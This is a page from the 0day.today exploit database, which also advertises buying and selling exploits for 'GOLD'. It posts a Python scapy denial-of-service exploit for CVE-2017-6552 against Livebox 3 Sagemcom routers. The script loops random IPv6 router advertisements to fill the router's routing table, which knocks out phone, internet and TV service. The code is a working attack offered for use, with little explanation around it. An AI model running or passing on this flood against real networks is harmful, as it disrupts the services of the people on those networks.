0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service Exploit
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
#!/usr/bin/python # Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3 # Date: 09/03/2017 # Exploit Author: Quentin Olagne # Vendor Homepage: http://www.orange.fr/ # Version: SG30_sip-fr-5.15.8.1 # Tested on: Livebox 3 - Sagemcom # CVE : CVE-2017-6552 ''' Livebox router has its default IPv6 routing table max. size too small and therefore can be filled within minutes. An attacker can exploit this issue to render the affected system unresponsive, resulting in a denial-of-service condition for Phone, Internet and TV services. Vulenrability has been discovered in April '16 and has been patched some time ago with the newest firmware. I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin livebox web UI, don't know if it's been implemented. ''' from scapy.all import * import time import threading start_time = time.time() def printit(): threading.Timer(5.0, printit).start() interval = time.time() - start_time print 'Total time in seconds:', interval, '\n' printit() packet = Ether() \ /IPv6() \ /ICMPv6ND_RA() \ /ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \ /ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42")) try: sendp(packet,loop=1) except KeyboardInterrupt: stored_exception=sys.exc_info() except: pass print "Goodbye" # 0day.today [2024-12-23] #